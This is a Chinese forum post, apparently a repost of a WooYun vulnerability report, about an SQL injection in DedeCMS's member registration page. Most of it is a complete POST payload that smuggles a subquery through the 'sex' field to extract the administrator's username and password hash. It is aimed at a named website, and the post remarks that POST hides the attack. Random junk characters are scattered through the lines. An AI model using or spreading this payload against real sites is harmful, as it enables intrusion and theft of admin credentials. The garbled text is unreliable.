漏洞类型: SQL注射漏洞2 `% |8 h, a1 z3 q- _ ^0 m X* R
简要描述:% K4 v! k3 A4 H5 ]8 d* B1 T
. c- d2 x% F5 T$ s需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞./ [) a- _9 a. u
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.% E+ T1 r) i% t5 Y; D
详细说明:跟这个漏洞
6 g. A( m6 U8 s4 _3 [% O
1 p4 J9 S- S% Q. X% x- \WooYun: Dedecms SQL注射导致审核机制绕过漏洞5 c1 l' f5 F0 I
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
6 m, r7 f7 J6 Y, _) DPOST提交以下数据,其实不用POST提交的,这样隐蔽点.& e5 f0 U* K3 I& n) R/ Y
5 [( N4 i/ o9 R: r; i% N/ jwww.political-security.com/member/reg_new.php
& R2 B, W1 c6 _ " ^- G+ o- K7 s; U+ a. L
POST) i0 u8 d8 y: n/ ?+ I3 E: d i+ j/ I& B
/ m& k! u/ p4 r; |# E% h* L. d
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&7 s7 {4 P" x2 S$ b
userid=c4rp3nt3r&uname=c4rp3nt3r/ w8 ]* {9 H8 K0 |9 L; s& ?& C
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss+ \, @& D a2 q
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,9 S0 F( {- X; F b+ P6 i) x
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');0 p) O. C, P$ s; ^: x0 A' E) }: L
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对